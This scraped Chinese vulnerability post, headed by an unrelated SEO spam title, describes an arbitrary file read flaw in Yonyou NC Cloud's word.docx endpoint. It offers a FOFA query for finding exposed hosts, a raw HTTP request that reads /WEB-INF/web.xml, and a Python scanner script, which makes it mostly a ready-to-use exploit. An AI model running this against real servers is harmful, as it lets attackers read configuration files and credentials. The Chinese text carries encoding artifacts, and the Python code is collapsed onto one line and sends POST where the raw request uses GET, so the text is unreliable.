回收那個(gè)網(wǎng)站做推廣好網(wǎng)站快速刷排名工具
聲明
本文僅用于技術(shù)交流,請(qǐng)勿用于非法用途
由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),文章作者不為此承擔(dān)任何責(zé)任。
一、產(chǎn)品介紹
用友 NC Cloud,大型企業(yè)數(shù)字化平臺(tái), 聚焦數(shù)字化管理、數(shù)字化經(jīng)營(yíng)、數(shù)字化商業(yè),幫助大型企業(yè)實(shí)現(xiàn) 人、財(cái)、物、客的全面數(shù)字化,從而驅(qū)動(dòng)業(yè)務(wù)創(chuàng)新與管理變革,與企業(yè)管理者一起重新定義未來(lái)的高度。為客戶提供面向大型企業(yè)集團(tuán)、制造業(yè)、消費(fèi)品、建筑、房地產(chǎn)、金融保險(xiǎn)等14個(gè)行業(yè)大類(lèi),68個(gè)細(xì)分行業(yè),涵蓋數(shù)字營(yíng)銷(xiāo)、智能制造、財(cái)務(wù)共享、數(shù)字采購(gòu)等18大解決方案,幫助企業(yè)全面落地?cái)?shù)字化。
二、漏洞描述
用友NC Cloud word.docx接口存在任意文件讀取漏洞
三、fofa語(yǔ)法
body="UClient.dmg"
四、漏洞復(fù)現(xiàn)
poc
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
五、poc.py
import requestsdef verify(ip):url = f'{ip}/portal/docctr/open/word.docx?disp=/WEB-INF/web.xml'headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)','Accept': ' * / *','Connection': 'Keep - Alive'}try:response = requests.post(url, headers=headers)print(response)# 驗(yàn)證成功輸出相關(guān)信息if response.status_code == 200:print(f"{ip}存在用友NC word.docx接口任意文件讀取漏洞!!!")else:print('漏洞不存在')except Exception as e:passif __name__ == '__main__':self = input('請(qǐng)輸入目標(biāo)主機(jī)IP地址:')verify(self)